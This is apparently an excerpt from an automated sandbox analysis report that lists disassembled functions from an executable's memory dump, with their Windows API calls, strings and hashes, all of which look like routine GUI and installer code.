                                                                                                                            • GetBitmapBits.GDI32(?,?,?), ref: 0041BF88
                                                                                                                            • GetBitmapBits.GDI32(?,?,?), ref: 0041BF96
                                                                                                                            • DeleteObject.GDI32(?), ref: 0041BF9F
                                                                                                                            • DeleteObject.GDI32(?), ref: 0041BFA8
                                                                                                                            • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFC5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1030595962-0
                                                                                                                            • Opcode ID: dabea464bc85c36b4411cc83672e19ff5768c85fc4c65aec36842f1966395034
                                                                                                                            • Instruction ID: 74cae3b7aa7aab4ce12a2fbd062d204c5c4082198076ec6df892ad84fd278e80
                                                                                                                            • Opcode Fuzzy Hash: dabea464bc85c36b4411cc83672e19ff5768c85fc4c65aec36842f1966395034
                                                                                                                            • Instruction Fuzzy Hash: 6A510671A002199FCB10DFA9C9819EEB7F9EF48314B11416AF914E7395D738AD41CB68
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041CED8 Relevance: 10.7, APIs: 7, Instructions: 152windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CEFE
                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000026), ref: 0041CF1D
                                                                                                                            • SelectPalette.GDI32(?,?,00000001), ref: 0041CF83
                                                                                                                            • RealizePalette.GDI32(?), ref: 0041CF92
                                                                                                                            • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041CFFC
                                                                                                                            • StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D03A
                                                                                                                            • SelectPalette.GDI32(?,?,00000001), ref: 0041D05F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: PaletteStretch$Select$BitsCapsDeviceModeRealize
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2222416421-0
                                                                                                                            • Opcode ID: 5be0e4e6833feb243a8d388dd1011de92277052336d3d318ec39d49e9b6efc72
                                                                                                                            • Instruction ID: 4b814cf558339e083a7fb5ccd56fb4ffad9fd0a27a4bfdacf16c2dd2476febac
                                                                                                                            • Opcode Fuzzy Hash: 5be0e4e6833feb243a8d388dd1011de92277052336d3d318ec39d49e9b6efc72
                                                                                                                            • Instruction Fuzzy Hash: D2515EB0604200AFDB14DFA8C985F9BBBE9EF08304F10459AB549DB292C778ED81CB58
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004572DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SendMessageA.USER32(00000000,?,?), ref: 0045732E
                                                                                                                              • Part of subcall function 0042427C: GetWindowTextA.USER32(?,?,00000100), ref: 0042429C
                                                                                                                              • Part of subcall function 0041EEA4: GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                                                                                              • Part of subcall function 0041EEA4: EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                                                                                              • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00457395
                                                                                                                            • TranslateMessage.USER32(?), ref: 004573B3
                                                                                                                            • DispatchMessageA.USER32(?), ref: 004573BC
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$TextThreadWindow$CurrentDispatchEnumSendTranslateWindows
                                                                                                                            • String ID: [Paused]
                                                                                                                            • API String ID: 1007367021-4230553315
                                                                                                                            • Opcode ID: 138259db96aaba9c66cb09bcf6582550d327018b684ee04c4d651f5f89e9d65e
                                                                                                                            • Instruction ID: a72840e20965590be0df7748d4dcd1bfe023db3bc5775872eefead19b10ec59e
                                                                                                                            • Opcode Fuzzy Hash: 138259db96aaba9c66cb09bcf6582550d327018b684ee04c4d651f5f89e9d65e
                                                                                                                            • Instruction Fuzzy Hash: 633175319082449ADB11DBB9EC81B9E7FB8EF49314F5540B7EC00E7292D73C9909DB69
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046B420 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99sleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetCursor.USER32(00000000,0046B55F), ref: 0046B4DC
                                                                                                                            • LoadCursorA.USER32(00000000,00007F02), ref: 0046B4EA
                                                                                                                            • SetCursor.USER32(00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B4F0
                                                                                                                            • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B4FA
                                                                                                                            • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B500
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Cursor$LoadSleep
                                                                                                                            • String ID: CheckPassword
                                                                                                                            • API String ID: 4023313301-1302249611
                                                                                                                            • Opcode ID: 301d54e166a0b4011b0937e4b70ed1e1b4ade500f65d2603abaf2adc357acc1d
                                                                                                                            • Instruction ID: 9465d4cba05e43c3341d6d018928b45656d3fee3f016636846a90655da25d4f4
                                                                                                                            • Opcode Fuzzy Hash: 301d54e166a0b4011b0937e4b70ed1e1b4ade500f65d2603abaf2adc357acc1d
                                                                                                                            • Instruction Fuzzy Hash: D0316334740204AFD711EF69C899B9A7BE4EF45308F5580B6F9049B3A2D7789E40CB99
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00477C6C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 92windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00477B94: GetWindowThreadProcessId.USER32(00000000), ref: 00477B9C
                                                                                                                              • Part of subcall function 00477B94: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477C93,0049C0A8,00000000), ref: 00477BAF
                                                                                                                              • Part of subcall function 00477B94: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477BB5
                                                                                                                            • SendMessageA.USER32(00000000,0000004A,00000000,00478026), ref: 00477CA1
                                                                                                                            • GetTickCount.KERNEL32 ref: 00477CE6
                                                                                                                            • GetTickCount.KERNEL32 ref: 00477CF0
                                                                                                                            • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 00477D45
                                                                                                                            Strings
                                                                                                                            • CallSpawnServer: Unexpected status: %d, xrefs: 00477D2E
                                                                                                                            • CallSpawnServer: Unexpected response: $%x, xrefs: 00477CD6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
                                                                                                                            • String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
                                                                                                                            • API String ID: 613034392-3771334282
                                                                                                                            • Opcode ID: a349fc6668a2a279a7709dc0d92d626649643492524c5ed72309cd5f58a9f2ee
                                                                                                                            • Instruction ID: 262cbc5b9954910938d5a1e8e32dc50db46ad6f301169d9d39307b56b522dac3
                                                                                                                            • Opcode Fuzzy Hash: a349fc6668a2a279a7709dc0d92d626649643492524c5ed72309cd5f58a9f2ee
                                                                                                                            • Instruction Fuzzy Hash: 87318474B042159EDB10EBB9C8867EE76A0AF08714F90807AB548EB392D67C9D4187AD
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00459784 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 86libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 0045983F
                                                                                                                            Strings
                                                                                                                            • Failed to load .NET Framework DLL "%s", xrefs: 00459824
                                                                                                                            • .NET Framework CreateAssemblyCache function failed, xrefs: 00459862
                                                                                                                            • Fusion.dll, xrefs: 004597DF
                                                                                                                            • Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 0045984A
                                                                                                                            • CreateAssemblyCache, xrefs: 00459836
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc
                                                                                                                            • String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
                                                                                                                            • API String ID: 190572456-3990135632
                                                                                                                            • Opcode ID: 64b7f7115ec2050a4f0e42ab113808549d669c8acfba7d9bf3bad921683fe547
                                                                                                                            • Instruction ID: 9a538673283cb431493768ab67eac729fe35d93f11f945e2dcd414e2b3f175b6
                                                                                                                            • Opcode Fuzzy Hash: 64b7f7115ec2050a4f0e42ab113808549d669c8acfba7d9bf3bad921683fe547
                                                                                                                            • Instruction Fuzzy Hash: A2318B70E10649ABCB10FFA5C88169EB7B8EF45315F50857BE814E7382DB389E08C799
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041C148 Relevance: 10.6, APIs: 7, Instructions: 70windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0041C048: GetObjectA.GDI32(?,00000018), ref: 0041C055
                                                                                                                            • GetFocus.USER32 ref: 0041C168
                                                                                                                            • GetDC.USER32(?), ref: 0041C174
                                                                                                                            • SelectPalette.GDI32(?,?,00000000), ref: 0041C195
                                                                                                                            • RealizePalette.GDI32(?), ref: 0041C1A1
                                                                                                                            • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1B8
                                                                                                                            • SelectPalette.GDI32(?,00000000,00000000), ref: 0041C1E0
                                                                                                                            • ReleaseDC.USER32(?,?), ref: 0041C1ED
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Palette$Select$BitsFocusObjectRealizeRelease
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3303097818-0
                                                                                                                            • Opcode ID: 26117fda3ddcda01a6cc84f42a4f6ec069d0e010bd6cdd98afb854c6c7779a8d
                                                                                                                            • Instruction ID: 25a0b6576c779426e59073023ceed4ef49f3845c1b310514cd4f08ef327de147
                                                                                                                            • Opcode Fuzzy Hash: 26117fda3ddcda01a6cc84f42a4f6ec069d0e010bd6cdd98afb854c6c7779a8d
                                                                                                                            • Instruction Fuzzy Hash: 49116D71A44604BFDF10DBE9CC81FAFB7FCEB48700F50486AB518E7281DA7899008B28
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00418C54 Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetSystemMetrics.USER32(0000000E), ref: 00418C70
                                                                                                                            • GetSystemMetrics.USER32(0000000D), ref: 00418C78
                                                                                                                            • 6F542980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C7E
                                                                                                                              • Part of subcall function 004107F8: 6F53C400.COMCTL32(0049B628,000000FF,00000000,00418CAC,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 004107FC
                                                                                                                            • 6F5ACB00.COMCTL32(0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CCE
                                                                                                                            • 6F5AC740.COMCTL32(00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CD9
                                                                                                                            • 6F5ACB00.COMCTL32(0049B628,00000001,?,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000), ref: 00418CEC
                                                                                                                            • 6F540860.COMCTL32(0049B628,00418D0F,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E), ref: 00418D02
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MetricsSystem$C400C740F540860F542980
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3392676452-0
                                                                                                                            • Opcode ID: e2c7fe5230f8d2f143d47c0d6a7892a097693e1c100db4317caf46c6149257f7
                                                                                                                            • Instruction ID: f48c8f8e6a400555c090207229051c9eae11b8a9b20c4da93df477ea8fa1a9e8
                                                                                                                            • Opcode Fuzzy Hash: e2c7fe5230f8d2f143d47c0d6a7892a097693e1c100db4317caf46c6149257f7
                                                                                                                            • Instruction Fuzzy Hash: 6B112475744204BBDB50EBA9EC82FAD73F8DB08704F504066B514EB2C1DAB9AD808759
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00483C6C Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00483D24), ref: 00483D09
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseOpen
                                                                                                                            • String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                                                                                            • API String ID: 47109696-2530820420
                                                                                                                            • Opcode ID: e1bcbbbaaee85d585434023fd650e6813b785c41e8fbc068ac73575afb55ee56
                                                                                                                            • Instruction ID: 212569cff1cfb7858b589fbdbabdc9c693f1f7cc945fcf11155ec0ddb5f1f406
                                                                                                                            • Opcode Fuzzy Hash: e1bcbbbaaee85d585434023fd650e6813b785c41e8fbc068ac73575afb55ee56
                                                                                                                            • Instruction Fuzzy Hash: CC117C30704244AADB10FF65D862B5E7BF9DB45B05F618877A800E7282EB78AE05875C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041B462 Relevance: 10.6, APIs: 7, Instructions: 57windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 0041B470
                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 0041B47F
                                                                                                                            • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4AB
                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041B4B9
                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 0041B4C7
                                                                                                                            • DeleteDC.GDI32(00000000), ref: 0041B4D0
                                                                                                                            • DeleteDC.GDI32(?), ref: 0041B4D9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ObjectSelect$Delete$Stretch
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1458357782-0
                                                                                                                            • Opcode ID: 8542cbb8adbe0fd8af4a730cfe3faeef428ae57c020086fb9cb954466ea4b08d
                                                                                                                            • Instruction ID: 052e9154069abc57648b404522aaf552eddfcc6d95cd3388d63b7ef9ce004286
                                                                                                                            • Opcode Fuzzy Hash: 8542cbb8adbe0fd8af4a730cfe3faeef428ae57c020086fb9cb954466ea4b08d
                                                                                                                            • Instruction Fuzzy Hash: 7B115C72E40619ABDB10DAD9DC86FEFB7BCEF08704F144555B614F7282C678AC418BA8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00495508 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetDC.USER32(00000000), ref: 00495519
                                                                                                                              • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0049553B
                                                                                                                            • GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00495AB9), ref: 0049554F
                                                                                                                            • GetTextMetricsA.GDI32(00000000,?), ref: 00495571
                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0049558E
                                                                                                                            Strings
                                                                                                                            • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 00495546
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Text$CreateExtentFontIndirectMetricsObjectPointReleaseSelect
                                                                                                                            • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                                                                                            • API String ID: 2948443157-222967699
                                                                                                                            • Opcode ID: 15e89f7ca813e7522845c960856b2cdc022ede195b48aa860a28df6e22a0f939
                                                                                                                            • Instruction ID: fbfe8d588f566b1ae935688c8d8bbf43f3780a3d17a9f30f48774e54417b88ea
                                                                                                                            • Opcode Fuzzy Hash: 15e89f7ca813e7522845c960856b2cdc022ede195b48aa860a28df6e22a0f939
                                                                                                                            • Instruction Fuzzy Hash: 98018476A04704BFEB05DBE9CC41E5EB7EDEB48714F614476F604E7281D678AE008B28
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00423394 Relevance: 10.6, APIs: 7, Instructions: 56threadwindowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetCursorPos.USER32 ref: 004233AF
                                                                                                                            • WindowFromPoint.USER32(?,?), ref: 004233BC
                                                                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233CA
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 004233D1
                                                                                                                            • SendMessageA.USER32(00000000,00000084,?,?), ref: 004233EA
                                                                                                                            • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423401
                                                                                                                            • SetCursor.USER32(00000000), ref: 00423413
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1770779139-0
